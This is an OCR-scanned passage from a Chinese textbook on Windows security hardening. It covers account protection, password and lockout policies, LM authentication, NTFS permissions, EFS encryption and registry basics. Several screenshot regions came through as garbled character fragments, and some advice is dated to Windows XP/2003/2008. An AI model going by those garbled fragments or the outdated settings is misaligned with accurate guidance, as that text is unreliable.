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6-5 NTLM 安全 验证 过 程 6-6 将 一 个 账户 放置 到 一 个 单独 的 安全 组 中 


(2) “本 地 用 户 和 组 ”是 管理 组 成 员 资 格 的 最 好 工具 。 要 管理 一 个 单独 用 户 账户 的 组 
成 员 资 格 ， 单 击 控制 台 树 中 的 “用 户 ”， 在 右 侧 详细 窗 格 中 双击 一 个 用 户 名 ， 在 出 现 的 属 
性 对 话 框 中 选择 “隶属 于 ”选项 卡 ， 如 图 6-7 所 示 。 单 击 “ 添 加 ”按钮 再 完成 确认 对 话 框 
就 可 以 将 用 户 账户 添加 到 一 个 组 中 ， 或 者 选择 一 个 组 并 单 击 “ 删 除 ” 按 钮 就 可 以 从 组 中 将 
该 账户 删除 。 

(3) Net Localgroup 命令 使 用 net localgroup group usernames /add 格式 (其 中 group 是 安 
全 组 名 ，usermames 是 一 个 或 多 个 用 户 名 ， 以 空格 分 隔 ) 将 一 个 账户 添加 到 一 个 用 户 组 中 。 
比如 ， 要 将 zhou 和 jian 添加 到 power users 组 ， 可 以 使 用 下 面 的 命令 : 

C:\>net localgroup "power users" zhou jian /add 

The command completed successfully. 

2) 保护 Administrator 账户 

Administrator 账户 是 恶意 攻击 者 首选 的 一 个 攻击 目标 。 首 先 ， 这 个 账户 掌握 着 整个 系 
统 的 “钥匙 ”， 任 何人 获得 了 Administrator 身份 就 可 以 在 计算 机 上 做 他 想 做 的 几乎 任何 事 
情 。 另 一 点 吸引 人 的 就 是 几乎 每 台 计 算 机 都 有 名 为 Administrator 的 账户 ， 因 为 用 户 名 是 已 
知 的 ， 攻 击 者 只 需要 判断 密码 即 可 。 

保护 Administrator 账户 除了 需要 为 其 指定 一 个 保险 的 密码 并 且 经 常 改变 它 以 外 ， 也 可 
以 通过 修改 Administrator 账户 的 名 称 来 更 好 地 保护 它 。 可 以 按照 下 列 步骤 来 修改 其 用 
户 名 。 

(1) 打开 “用 户 账户 ”选项 卡 。( 如 果 您 使 用 Windows XP 且 计 算 机 没有 加 入 域 ， 可 以 
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在 命令 提示 符 中 输入 control userpasswords2。) 
(2) 在 “用 户 ” 选 项 卡 中 ， 双 击 Administrator 账户 。 
(3) 在 “用 户 名 ”文本 框 中 ， 输 入 Administrator 账户 的 新 名 称 ， 如 图 6-8 所 示 。 
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6-7 ”组 成 员 资格 管理 6-8 修改 Administrator 账户 的 名 称 


将 Administrator 账户 重 命名 后 ， 可 以 创建 名 为 Administrator 的 新 用 户 账户 ， 将 这 个 账 
户 放 到 Guests 安全 组 再 为 其 指定 一 个 保险 的 密码 。 这 样 的 账户 有 两 个 用 途 : 它 是 吸引 攻击 
者 注意 力 的 一 个 诱饵 ， 而 且 可 以 帮助 您 判断 是 否 有 人 在 试图 冯 入 您 的 系统 。 

要 在 Windows XP 中 关闭 Administrator 账户 ， 在 “用 户 账 户 ” 对 话 框 中 双击 该 账户 ， 
在 弹出 的 对 话 框 中 选择 “账户 已 停 用 ”， 再 单 击 “ 确 定 ” 按 钮 。 

对 于 Windows 2003/2008， 不 能 停 用 内 置 的 账户 ， 但 是 可 以 指派 一 个 用 户 权利 来 阻止 
该 账户 登录 。 启 动 “本 地 安全 设置 ”打开 “安全 设置 ” |“ 本 地 策略 ”|“ 用 户 权利 指派 ”。 
在 右 侧 的 详细 信息 窗 格 中 双击 “拒绝 本 地 登录 ”权利 ， 单 击 “ 添 加 ”按钮 ， 选 择 
Administrator 账户 ， 单 击 “ 添 加 ”按钮 ， 再 单 击 “ 确 定 ” 按 钮 。 

3) 保护 Guest 账户 

Guest 账户 可 以 为 偶尔 使 用 的 用 户 提供 方便 的 访问 。Gnuest 账户 的 用 户 可 以 访问 计算 机 
的 程序 、“ 共 享 文档 ”文件 夹 中 的 文件 以 及 Guest 用 户 配置 文件 中 的 文件 。 尽 管 Guest 账 
户 只 提供 有 限 的 访问 权 ， 但 它 也 为 入 侵 者 提供 了 另 一 种 方法 来 获取 进入 计算 机 的 立足 点 。 
而 且 ， 因 为 使 用 这 个 账户 通常 不 需要 密码 ， 所 以 应 该 保证 Guest 账户 不 会 暴露 一 个 普通 用 
户 不 应 该 看 到 或 进行 编辑 的 项 目 。 对 于 Guest 账户 的 保护 ， 应 注意 以 下 几 点 : 

(1) 如 果 不 需 要 Guest 账户 ， 将 其 关闭 或 停 用 。 

(2) 重 命名 Guest 账户 。 

(3) 防止 Guest 账户 进行 网 络 登 录 。 

(4) 防止 Guest 用 户 关闭 计算 机 。 

(5) 防止 Guest 用 户 查看 事件 日 志 。 

4) 创建 保险 的 密码 

大 多 数 用 户 为 了 方便 记忆 或 使 用 ， 常 将 密码 留 作 空 白 或 是 倾向 于 使 用 极为 简单 的 密 
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码 ， 比 如 password、test 或 是 自己 的 用 户 名 。 其 他 人 则 使 用 特别 的 日 期 或 是 配偶 、 宠 物 或 
喜爱 的 运动 队 的 名 字 作 为 密码 ， 希 望 能 够 提供 一 些 安全 性 。 还 有 一 些 人 使 用 他 们 想到 的 随 
机 的 单词 作为 密码 ， 认 为 这 样 会 更 加 安全 。 但 是 这 些 方法 都 挡 不 住 高 级 的 密码 破解 程序 ， 
后 者 通常 只 需要 几 分 钟 就 可 以 正确 地 找到 这 些 密码 。 

可 以 通过 使 用 保险 的 密码 来 抵挡 密码 破解 程序 。 尽 管 最 终 这 样 的 密码 还 是 会 被 破解 ， 
但 是 不 会 只 需 几 个 小 时 ， 而 是 将 花费 数 月 的 时 间 。 一 个 保险 的 密码 应 该 满足 以 下 要 求 : 

(1) 包含 至 少 8 个 字符 。 

(2) 包含 大 写 和 小 写字 母 、 数 字 和 符号 的 组 合 。 

(3) 定期 修改 ， 并 且 新 密码 与 前 一 个 密码 应 有 较 大 的 差别 。 

(4) 不 包含 用 户 的 姓名 、 用 户 名 、 其 他 的 单词 或 名 称 。 

(5) 不 与 其 他 人 共享 。 

5) 设置 密码 策略 

要 保证 网 络 上 的 用 户 不 会 将 密码 之 门 大 开 ， 应 该 建立 并 遵守 一 些 有 效 的 登录 密码 策略 
和 原则 。 在 Windows 系统 中 内 置 了 一 些 密码 策略 ， 可 以 使 用 Windows 中 的 安全 设置 来 强 
制 执行 这 些 策略 中 的 某 些 项 目 。 

打开 “本 地 安全 设置 ”窗口 ， 打 开 “ 安 全 设置 ”一 “账户 策略 ”一 “密码 策略 ”分 
支 。 双 击 一 个 策略 来 设置 它 的 值 ， 如 图 6-9 所 示 。 


吉本 地 人 实 全 讼 置 
文件 中 ”所 作 D 查看 WD 帮助 0 











Ec3 
| 国 空 现 必 须 符 计 复杂 竹 要 求 
天宇 码 发 度量 小 值 
EE 


er 记 玛 长度 最 小 值 后 


4 加 公 届 阁 | 国 
+ 加 次 件 限 和 第 略 ee 
让 量 T 安全 当中 ,在 二 地 | 国 为 


司 意 码 长 度 全 小 信 


不 要 求 安 码 - 
CE 











图 6-9 密码 策略 

5. 控制 登录 及 身份 验证 过 程 

1) 提高 欢迎 屏幕 的 安全 性 

Windows XP 的 欢迎 屏幕 给 用 户 带 来 了 便利 性 ， 用 户 只 需要 单 击 鼠 标 就 可 以 进行 登录 
(如 果 账 户 要 求 密码 ， 则 需 输 入 密码 )， 但 它 同时 也 会 向 其 他 人 暴露 用 户 名 和 密码 提示 。 按 
照 下 列 步骤 可 以 关闭 欢迎 屏幕 。 

(1) 在 “控制 面板 ”窗口 中 打开 “用 户 账户 ”对 话 框 。 

(2) 在 “用 户 账户 ”对 话 框 中 ， 单 击 “ 更 改 用 户 登录 或 注销 的 方式 ”按钮 。 

(3) 取消 选中 “使 用 欢迎 屏幕 ” 复 选 框 ， 再 单 击 “ 应 用 选项 ”按钮 。 
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2) 提高 传统 登录 方式 的 安全 性 并 控制 自动 登录 


从 Windows NT 开始 ， 系 统 会 要 求 用 户 按 Ctrl+Altt+Delete 组 合 键 来 显示 出 “登录 到 ” 
Windows 对 话 框 ， 从 而 保证 系统 启动 程序 的 正确 调用 。 提 高 传统 登录 方式 的 安全 性 ， 要 保 
证 启用 了 CtrlHAltHDelete 组 合 键 要 求 。 

(1) 在 Windows 2008 中 ， 打 开 “ 控 制 面板 ”再 双击 “用 户 和 密码 ”选项 。 在 Windows 
7 中 ， 打 开 “ 运 行 ”对 话 框 ， 输 入 control userpasswords2 命令 。 

(2) 打开 “用 户 账户 ”对 话 框 ， 切 换 到 “高 级 ”选项 卡 ， 保 证 “要 求 用 户 按 Ctrl+Alt+ 
Delete” 复 选 框 被 选中 ， 如 图 6-10 所 示 。 

(3) 要 关闭 自动 登录 ， 选 择 “ 用 户 ” 选 项 卡 ， 选 中 “要 使 用 本 机 ， 用 户 必 须 输入 用 户 
名 和 密码 ” 复 选 框 ， 如 图 6-11 所 示 。 


| 用户 丁 庙 
ET Passport 列表 摇 也 或 拒绝 用 户 访 问 娩 的 计算 机 ， 还 可 以 更 改 其 密 
的 DL 的 Hz 可 ， 台 者 用 .ver 多 
Passport Uh Passport» 生生 人 
ET Pssport 网 导 吕 ) 本 机 用 户 QD 


高 要 用 户 冲 理 
多 可 以 用 本 地 用 户 和 组 来 执行 高 最 用 户 管理 任务 。 


CR 





安全 四 录 


要 增加 安全 性 ， 您 可 在 区 录 之 | 本 
用 ns 





-可 Das 


a + 防止 模仿 


Ea 要 tp 提 搓 “ 更 9 
加 要 于 用 这 Ctrl-AIt Dera ET 

















[CC 可 | 陶 ]Cw ] 二 [而 两 ] [由 
图 6-10 “用 户 账户 ”对 话 框 的 “高 级 ”选项 卡 ”图 6-11 “用 户 账户 ”对 话 框 的 “用 户 ” 选 项 卡 


3) 设置 账户 锁定 策略 

账户 锁定 策略 允许 在 用 户 输入 了 太 多 次 数 的 错误 密码 之 后 锁定 那个 账户 。 设 置 这 个 策 
略 是 一 个 对 付 密码 破解 企图 的 保卫 措施 ， 防 止 用户 ( 程 序 ) 重 复 使 用 不 同 密码 进行 登录 。 账 
户 锁定 策略 设置 对 话 框 如 图 6-12 所 示 。 

4) 关闭 LM 身份 验证 

如 果 网 络 上 所 有 的 计算 机 都 运行 着 Windows 2003 版 本 以 上 的 操作 系统 ， 可 以 关闭 那 
些 安全 性 较 弱 的 身份 验证 方式 ， 从 而 关闭 攻击 者 可 能 会 用 到 的 一 些 通道 。 要 关闭 LM 身份 
验证 ， 启 动 “本 地 安全 设置 ”， 再 打开 “安全 设置 ”一 “本 地 策略 ”一 “安全 选项 ”分 
支 ， 在 右 侧 的 详细 信息 窗 格 中 ， 双 击 “ 网 络 安全 : Lan Manager 身份 验证 级 别 ”( 对 于 
Windows XP) 或 “Lan Manager 身份 验证 级 别 ”( 对 于 Windows 2008)。 在 打开 对 话 框 的 下 拉 
列表 中 ， 选 择 “ 仅 发 送 NTLMv2 响应 \ 拒 绝 LM&NTLM”， 如 图 6-13 所 示 。 这 样 会 有 助 于 
阻止 像 LC3 这 样 可 以 截获 在 网 络 通信 中 与 密码 相关 的 数据 包 的 密码 破解 工具 。 
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图 6-13 设置 身份 验证 级 别 
6.2.2 文件 系统 的 安全 


文件 系统 是 操作 系统 对 文件 的 管理 方式 。 目 前 使 用 的 文件 系统 有 很 多 ， 常 见 的 就 是 
FAT32 和 NTFS。 而 NTFS 文件 系统 比 FAT32 文件 系统 具有 更 好 的 性 能 ， 其 中 安全 性 是 
NTFS 文件 系统 的 一 个 重要 特点 。 


1. NTFS 文件 系统 简介 
NTFS 是 新 技术 文件 系统 (New Technology File System) 的 英文 缩写 。NTFS 文件 系统 是 
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专门 为 服务 器 系统 设计 的 ， 同 时 也 是 微软 取代 FAT32 的 文件 系统 。 

NTFS 文件 系统 的 优点 主要 集中 于 安全 性 、 容 错 性 和 更 为 强大 的 管理 能 力 。 其 中 安全 
性 主要 体现 在 以 下 两 个 方面 。 

1) 通过 NTFS 权限 保护 网 络 资源 

在 Windows NT 下 ， 网 络 资源 的 本 地 安全 性 是 通过 NTFS 许可 权限 来 实现 的 。 在 一 个 
格式 化 为 NTFS 的 分 区 上 ， 每 个 文件 或 者 文件 夹 都 可 以 单独 地 分 配 一 个 许可 ， 这 个 许可 使 
得 这 些 资 源 具备 更 高 级 别 的 安全 性 ， 用 户 无 论 是 在 本 机 还 是 通过 远程 网 络 访问 具有 “NTFS 
许可 的 资源 ， 都 必须 具备 访问 这 些 资源 的 权限 。 

2) 支持 加 密 文 件 系统 (EFS) 

NTFS 支持 加 密 文件 系统 (Encrypting File System，EFS)， 可 以 阻止 没有 授权 的 用 户 访 
问 文件 。EFS 提供 对 存储 在 NTFS 分 区 中 的 文件 进行 加 密 的 功能 。EFS 加 密 技术 基于 公 
共 密 钥 ， 并 作为 集成 的 系统 服务 运行 ， 具 有 管理 容易 、 攻 击 困 难 、 对 文件 所 有 者 透明 等 
特点 。 


2. NTFS 权限 


NTFS 权限 只 适用 于 NTEFS 磁盘 分 区 。NTFS 权限 是 磁盘 上 保存 的 文件 或 文件 夹 的 权 
限 ， 不 能 用 于 由 FAT 或 者 FAT32 文件 系统 格式 化 的 磁盘 分 区 。 

为 了 保护 NTFS 磁盘 分 区 上 的 文件 ， 要 为 需要 访问 该 资源 的 每 一 个 用 户 账户 授予 
NTFS 权限 。 用 户 必须 获得 明确 的 授权 才能 访问 资源 ， 用 户 账户 如 果 没 有 被 授予 权限 ， 它 
就 不 能 访问 相应 的 文件 或 者 文件 夹 。 不 管用 户 是 访问 文件 还 是 访问 文件 夹 ， 也 不 管 这 些 文 
件 或 文件 夹 是 在 计算 机 上 还 是 在 网 络 上 ，NTFS 的 安全 性 功能 都 有 效 。 

1) NTFS 的 文件 夹 权限 

可 以 通过 授予 文件 夹 权限 ， 来 控制 对 文件 夹 和 包含 在 这 些 文件 夹 中 的 文件 与 子 文件 夹 
的 访问 。 表 6-6 列 出 了 可 以 授予 的 标准 NTFS 文件 夹 的 各 个 权限 提供 的 访问 类 型 。 


表 6-6 NTFS 的 文件 夹 权 限 

















NTFS 的 文件 夹 权 限 允许 的 访问 类 型 

读 取 查看 文件 夹 中 的 文件 和 子 文件 夹 ， 查 看 文件 夹 属性 、 拥 有 人 和 权限 

写 入 在 文件 夹 内 创建 新 的 文件 和 子 文件 夹 ， 修 改 文件 夹 属性 ， 查 看 文件 夹 的 拥有 
人 和 权限 

列 出 文件 夹 目录 查看 文件 夹 中 的 文件 和 子 文件 夹 的 名 称 

读 取 和 运行 遍历 文件 夹 ， 执 行 允许 “ 读 ” 权 限 和 “ 列 出 文件 夹 目 录 ” 进 行 的 动作 

修改 删除 文件 夹 ， 执 行 允许 “ 写 ” 权 限 和 “ 读 取 和 运行 ”权限 进行 的 动作 

完全 控制 改变 权限 ， 成 为 拥有 人 ， 删 除 子 文件 夹 和 文件 ， 以 及 执行 允许 所 有 其 他 NTFS 





文件 夹 权 限 进行 的 动作 


2) NTFS 的 文件 权限 
可 以 通过 授予 文件 权限 ， 控 制 对 文件 的 访问 。 表 6-7 列 出 了 可 以 授予 的 标准 NTFS 文 
件 权限 和 各 个 权限 提供 给 用 户 的 访问 类 型 。 
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表 6-7 NTFS 的 文件 权限 











NTFS 的 文件 权限 允许 的 访问 类 型 

读 取 | 读 文 件 ， 查 看 文件 属性 、 拥 有 人 和 权限 

写 入 | 覆盖 写 入 文件 ， 修 改 文件 属性 ， 查 看 文件 拥有 人 和 权限 
读 取 和 运行 | 运行 应 用 程序 ， 执 行 由 “ 读 取 ” 权 限 进行 的 动作 





修改 修改 和 删除 文件 ， 执 行 由 “ 写 ” 权 限 和 “ 读 取 和 运行 ”权限 进行 的 动作 





改变 权限 ， 成 为 拥有 人 和 执行 允许 所 有 其 他 NTFS 文件 权限 进行 的 动作 


3) NTFS 权限 的 使 用 原则 

一 个 用 户 可 能 属于 多 个 组 ， 而 这 些 组 又 有 可 能 对 某 种 资源 赋予 了 不 同 的 权限 ， 另 外 用 
户 或 组 可 能 会 对 某 个 文件 夹 和 该 文件 夹 下 的 文件 有 不 同 的 访问 权限 。 在 这 种 情况 下 ， 就 必 
须 通 过 NTFS 权限 原则 来 判断 到 底 用 户 对 资源 有 何 种 访问 权限 。 

(1) 权限 最 大 原则 : 当 一 个 用 户 同时 属于 多 个 组 ， 而 这 些 组 又 有 可 能 被 对 某 种 资源 赋 
了 予 了 不 同 的 访问 权限 ， 则 用 户 对 该 资源 最 终 有 效 权限 是 在 这 些 组 中 最 宽松 的 权限 ， 即 加 权 
限 ， 将 所 有 的 权限 加 在 一 起 即 为 该 用 户 的 权限 。 

(2) 文件 权限 超越 文件 夹 权 限 原 则 : 当 用 户 或 组 对 某 个 文件 夹 以 及 该 文件 夹 下 的 文件 
有 不 同 的 访问 权限 时 ， 用 户 对 文件 的 最 终 权 限 是 用 户 被 赋予 访问 该 文件 的 权限 ， 即 文件 权 
限 超越 文件 的 上 级 文件 夹 的 权限 ， 用 户 访问 该 文件 夹 下 的 文件 不 受 文件 夹 权 限 的 限制 ， 而 
只 是 受 被 赋予 的 文件 权限 的 限制 。 

(3) 拒绝 权限 超越 其 他 权限 的 原则 : 当 用 户 对 某 个 资源 有 拒绝 权限 时 ， 该 权限 覆盖 其 
他 任何 权限 ， 即 在 访问 该 资源 的 时 候 只 有 拒绝 权限 时 有 效 。 当 有 拒绝 权限 时 ， 权 限 最 大 原 
则 无 效 。 因 此 对 于 拒绝 权限 的 授予 应 该 慎重 考虑 。 

在 Windows NT 系列 操作 系统 中 没有 一 种 权限 叫 作 “ 拒 绝 ” 权 限 ， 实 际 上 在 Windows 
NT 系列 操作 系统 中 的 每 一 种 权限 都 有 两 个 状态 一 一 允许 和 拒绝 ， 如 图 6-14 所 示 。 


第 规 安全 ”| 自 定 义 | 搞 要 
组 或 用 户 名 称 @) 























CD 








图 6-14 权限 的 两 个 状态 
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当 一 个 分 区 被 格式 化 为 NTFS 之 后 ，Windows 2000 系统 会 自动 将 Everyone 组 赋予 对 
该 分 区 的 根 文件 夹 的 完全 控制 权限 。Everyone 组 是 Windows 2000 中 的 一 个 内 置 系统 组 ， 
所 有 访问 资源 的 用 户 自动 成 为 Everyone 组 的 成 员 ， 而 不 管用 户 是 否 属于 某 个 组 。 这 个 默认 
设置 对 于 系统 安全 来 说 是 一 个 重大 的 隐患 ， 所 有 应 该 在 安装 完 系 统 后 第 一 时 间 把 Everyone 
组 删除 掉 。 

4) NTFS 权限 的 继承 性 

授予 父 文件 夹 的 任何 权限 将 应 用 于 包含 在 该 文件 夹 中 的 子 文件 夹 和 文件 。 当 授予 访问 
某 个 文件 夹 的 NTFS 权限 时 ， 就 将 该 文件 夹 的 NTFS 权限 授予 了 该 文件 夹 中 任何 现 有 的 文 
件 和 子 文件 夹 ， 以 及 在 该 文件 夹 中 创建 的 任何 新 的 文件 和 文件 夹 。 

可 以 阻止 权限 的 继承 ， 也 就 是 阻止 子 文件 从 父 文件 夹 继承 权限 。 为 了 阻止 权限 的 继 
承 ， 需 删除 继承 来 的 权限 ， 只 保留 被 明确 授予 的 权限 。 

当 一 个 文件 夹 向 另 一 个 文件 夹 复制 ( 移 动 ) 文 件 或 文件 夹 时 ， 或 者 从 一 个 磁盘 分 区 向 另 
一 个 磁盘 分 区 复制 (移动 ) 文 件 或 者 文件 夹 时 ， 这 些 文件 或 者 文件 夹具 有 的 NTFS 权限 会 发 
生 不 同 的 变化 ， 表 6-8 显示 了 这 些 变化 。 


表 6-8 NTF 权限 变化 


动 作 同一 个 NTFS 分 区 内 不 同 的 NTFS 分 区 之 间 从 NTFS 分 区 到 FAT 分 区 








继承 目的 地 文件 夹 权 限 继承 目的 地 文件 夹 权 限 
保留 原 有 NTFS 权限 继承 目的 地 文件 夹 权 限 权限 丢失 





3. 加 密 文件 系统 (EFS) 


EFS(Encrypting File System， 加 密 文件 系统 ) 提 供 一 种 核心 的 文件 加 密 技术 ， 能 对 存储 
在 NTFS5 分 区 上 的 文件 进行 加 密 (NTFS5S 分 区 指 由 Windows 2000/XP Pro/2003 格式 化 过 的 
NTFS 分 区 ; 而 由 Windows NT4 格式 化 的 NTFS 分 区 是 NTFS4 格式 的 ， 虽 然 同 样 是 NTFS 
文件 系统 ， 但 它 不 支持 EFS 加 密 )。 

EFS 加 密 是 基于 公 钥 策略 的 。 在 使 用 EFS 加 密 一 个 文件 或 文件 夹 时 ， 系 统 首先 会 生成 
一 个 由 伪 随机 数组 成 的 FEK(File Encryption Key， 文 件 加 密 钥匙 )， 然 后 利用 FEK 和 数据 扩 
展 标准 X(DESX) 算 法 创建 加 密 后 的 文件 ， 并 把 它 存储 到 硬盘 上 ， 同 时 删除 未 加 密 的 原始 文 
件 。 随 后 系统 利用 公 钥 加 密 FEK， 并 把 加 密 后 的 FEK 存储 在 同一 个 加 密 文件 中 。 在 访问 
被 加 密 的 文件 时 ， 系 统 首 先 利 用 当前 用 户 的 私 钥 解密 FEK， 然 后 利用 FEK 解密 文件 。 在 
首次 使 用 EFS 时 ， 如 果 用 户 还 没有 公 钥 / 私 钥 对 (统称 为 密 钥 )， 则 会 首先 生成 密 钥 ， 然 后 加 
密 数据 。 如 果 登 录 到 了 域 环境 中 ， 密 钥 的 生成 依赖 于 域 控制 器 ， 否 则 它 就 依赖 于 本 地 机 
器 。 密 钥 对 是 由 操作 系统 根据 用 户 的 安全 标识 符 (SID) 来 生成 的 ，SID 的 唯一 性 保证 了 密 钥 
对 的 唯一 性 。 密 钥 对 中 的 公 钥 通过 EFS 证 书 进行 保护 。 

EFS 加 密 机 制 和 操作 系统 紧密 结合 ， 因 此 不 必 为 了 加 密 数 据 安装 额外 的 软件 ， 这 节约 
了 使 用 成 本 。EFS 加 密 系 统 对 用 户 是 透明 的 。 这 也 就 是 说 ， 如 果 你 加 密 了 一 些 数据 ， 那 么 
你 对 这 些 数 据 的 访问 将 是 完全 允许 的 ， 不 会 受到 任何 限制 。 而 其 他 非 授 权 用 户 试图 访问 加 
密 过 的 数据 时 ， 就 会 收 到 “访问 拒绝 ”的 错误 提示 。EFS 加 密 的 用 户 验证 过 程 是 在 登录 
Windows 时 进行 的 ， 只 要 登录 到 Windows， 就 可 以 打开 任何 一 个 被 授权 的 加 密 文件 。 
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使 用 EFS 类 似 于 使 用 文件 和 文件 夹 上 的 权限 。 两 个 方法 都 可 用 于 限制 数据 的 访问 ， 然 
而 ， 未 经 许可 对 加 密 的 文件 和 文件 夹 进行 物理 访问 的 入 侵 者 将 无 法 读 取 这 些 文件 和 文件 夹 
中 的 内 容 。 如 果 入 侵 者 试图 打开 或 复制 已 加 密 的 文件 或 文件 夹 ， 将 收 到 拒绝 访问 消息 。 文 
件 和 文件 夹 上 的 权限 不 能 防止 未 授权 的 物理 攻击 (例如 为 了 非法 获得 重要 数据 而 重新 安装 操 
作 系 统 ， 并 以 新 的 管理 员 身 份 给 自己 指派 权限 )。 

选中 想 加 密 的 文件 或 文件 夹 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 打 开 属 
性 对 话 框 ， 在 “常规 ”选项 卡 下 单 击 “ 高 级 ”按钮 ， 之 后 在 弹出 的 对 话 框 中 选中 “加 密 内 
容 以 便 保护 数据 ” 复 选 框 ， 如 图 6-15 所 示 。 然 后 单 击 “ 确 定 ”按钮 ， 等 待 片刻 数据 就 加 密 
好 了 。 如 果 加 密 的 是 一 个 文件 夹 ， 系 统 还 会 询问 你 ， 是 把 这 个 加 密 属性 应 用 到 文件 夹 上 还 
是 文件 夹 以 及 内 部 的 所 有 子 文 件 夹 。 按 照 你 的 实际 情况 来 操作 即 可 。 解 密 数据 也 是 很 简单 
的 ， 同 样 是 按照 上 面 的 方法 ， 在 “高 级 属性 ”对 话 框 中 取消 选中 “加 密 内 容 以 便 保 护 数 
据 ” 复 选 框 ， 然 后 单 击 “ 确 定 ” 按 钮 。 


[请 4 请 时 撞 用 于 该 文件 天 的 设置 , 
各 六 +， 系统 会 询问 您 是 否 格 这 些 更 改 同时 应 用 于 
和 文件 。 
存档 和 编制 案 引 属性 
 。 口 可 以 存档 文件 夹 
加 为 了 快速 搜索 ， 允 洗 素 引 服务 编制 该 文件 夹 的 案 引 (I) 


“EBD 属性 
口 压 久 内 容 以 便 节省 珊 和 空间 C) 
回 现 可 内 容 区 硬 保 护 数 阁 到 ) 











图 6-15 用 EFS 加 密 文件 夹 


还 可 以 在 命令 行 模式 下 用 cipher 命令 完成 对 数据 的 加 密 和 解密 操作 。 至 于 cipher 命令 
更 详细 的 使 用 方法 ， 则 可 以 通过 在 命令 符 后 输入 cipher/? 并 按 Enter 键 获得 。 

在 使 用 EFS 加 密 文件 和 文件 夹 时 ， 以 下 几 点 值得 注意 。 

(1) 如 果 把 未 加 密 的 文件 复制 到 具有 加 密 属 性 的 文件 夹 中 ， 这 些 文件 将 会 被 自动 加 密 。 

(2) 若是 将 加 密 数 据 移出 来 ， 如 果 移动 到 NTFS 分 区 上 ， 数 据 依旧 保持 加 密 属性 ， 如 
果 移 动 到 FAT 分 区 上 ， 这 些 数据 将 会 被 自动 解密 。 

(3) 被 EFS 加 密 过 的 数据 不 能 在 Windows 中 直接 共享 。 如 果 通 过 网 络 传输 被 EFS 加 
密 过 的 数据 ， 这 些 数据 在 网 络 上 将 会 以 明文 的 形式 传输 。 

(4) NTFS 分 区 上 保存 的 数据 还 可 以 被 压缩 ， 不 过 一 个 文件 不 能 同时 被 压缩 和 加 密 。 

(5) Windows 的 系统 文件 和 系统 文件 夹 无 法 被 加 密 。 

在 EFS 加 密 系统 中 ， 还 有 故障 恢复 代理 这 一 概念 。 故 障 恢复 代理 是 指 获得 授权 解密 由 
其 他 用 户 加 密 的 数据 的 个 人 。 如 果 由 于 磁盘 故障 、 火 灾 或 其 他 原因 永久 丢失 文件 加 密 证 书 
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和 相关 私 钥 ， 指 定 为 故障 恢复 代理 的 人 员 就 可 以 恢复 数据 。 举 例 来 说 ， 公 司 财务 部 的 一 个 
职工 加 密 了 财务 数据 的 报表 ， 某 天 这 位 职工 辞职 了 ， 为 了 安全 起 见 ， 管 理 员 直接 删除 了 这 
位 职工 的 账户 。 直 到 有 一 天 需要 用 到 这 位 职工 创建 的 财务 报表 时 才 发 现 这 些 报表 是 被 加 密 
的 ， 而 用 户 账户 已 经 删除 ， 这 些 文件 无 法 打开 了 。 不 过 只 要 有 故障 恢复 代理 的 存在 就 可 以 
解决 这 个 问题 。 因 为 被 EFS 加 密 过 的 文件 ， 除 了 加 密 者 本 人 之 外 ， 还 有 故障 恢复 代理 可 以 
打开 。 

对 于 Windows 2003/2008 来 说 ， 在 单机 和 工作 组 环境 下 ， 默 认 的 恢复 代理 是 Administrator; 
Windows 7 在 单机 和 工作 组 环境 下 没有 默认 的 恢复 代理 。 而 在 域 环境 中 就 完全 不 同 了 ， 所 
有 加 入 域 的 Windows 计算 机 ， 默 认 的 恢复 代理 全 部 是 域 管理 员 。 


6.2.3 ”注册 表 的 安全 


注册 表 是 管理 配置 系统 运行 参数 的 一 个 核心 数据 库 ， 针 对 注册 表 的 一 次 错误 的 操作 可 
能 会 对 操作 系统 造成 不 可 挽回 的 破坏 ， 病 毒 、 特 洛 伊 木 马 和 其 他 的 恶意 软件 通常 会 通过 扰 
乱 注 册 表 来 给 系统 造成 破坏 ， 比 如 增加 启动 值 项 等 。 下 面 首先 介绍 注册 表 的 一 些 基 础 知 
识 ， 然 后 介绍 注册 表 的 安全 防范 措施 。 


1. 注册 表 基 础 


早期 的 图 形 操作 系统 ， 如 Windows 3.X 中 ， 对 软 硬 件 工作 环境 的 配置 是 通过 对 扩展 名 
为 .ini 的 文件 进行 修改 来 完成 的 ， 但 ini 文件 管理 起 来 很 不 方便 ， 因 为 每 种 设备 和 应 用 程序 
都 得 有 自己 的 ini 文件 ， 并 且 在 网 络 上 难以 实现 远程 访问 。 为 了 克服 上 述 这 些 问 题 ， 微 软 
公司 从 Windows 95 开始 采用 了 一 种 叫 作 “注册 表 ” 的 数据 库 来 进行 统一 管理 。 在 该 数据 
库 中 整合 集成 了 全 部 系统 和 应 用 程序 的 初始 化 信息 ， 其 中 包含 了 硬件 设备 的 说 明 、 相 互 关 
联 的 应 用 程序 与 文档 文件 、 窗 口 显示 方式 、 网 络 连接 参数 ， 甚 至 有 关系 到 计算 机 安全 的 网 
络 共享 设置 。 它 与 老 的 系统 里 的 ini 文件 相 比 ， 具 有 方便 管理 、 安 全 性 较 高 、 适 于 网 络 操 
作 等 特点 。 

在 形式 上 ， 注 册 表 与 ini 文件 有 两 个 显著 的 区 别 。 

(1) 注册 表 采 用 的 是 二 进 制 形式 登录 数据 ，ini 文件 采用 的 则 是 简单 的 文本 形式 登录 
数据 。 

(2) 注册 表 支 持 子 关 键 字 ， 各 级 子 关 键 字 都 有 自己 的 “ 键 值 ”，ini 文件 中 则 支持 节 以 
及 节 中 的 参数 。 

在 功能 上 ， 注 册 表 与 ini 文件 相 比 ， 主 要 有 以 下 3 个 特点 。 

(1) 注册 表 允 许 对 硬件 、 某 些 操作 系统 参数 、 应 用 程序 和 设备 驱动 程序 进行 跟踪 配 
置 ， 这 使 得 某 些 配置 的 改变 可 以 在 不 重新 启动 系统 的 情况 下 立即 生效 。 

(2) 注册 表 中 登录 的 硬件 部 分 数据 可 以 用 来 支持 Windows 的 即 插 即 用 特性 。 当 
Windows 检测 到 机 器 上 的 各 种 设备 时 ， 就 把 有 关 数 据 保存 到 注册 表 中 。 通 常 是 在 安装 时 进 
行 这 种 检测 的 ， 但 Windows 启动 或 原 有 配置 改变 时 ， 也 要 进行 检测 。 如 安装 一 个 新 的 硬件 
时 ，Windows 将 检查 注册 表 ， 以 便 确定 哪些 资源 已 被 占用 ， 这 样 就 可 以 避免 新 设备 与 原 有 
设备 之 间 的 资源 冲突 。 
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(3) 通过 注册 表 ， 管 理 人 员 和 用 户 可 以 在 网 络 上 检查 系统 的 配置 和 设置 ， 使 得 远程 管 


理 得 以 实现 。 





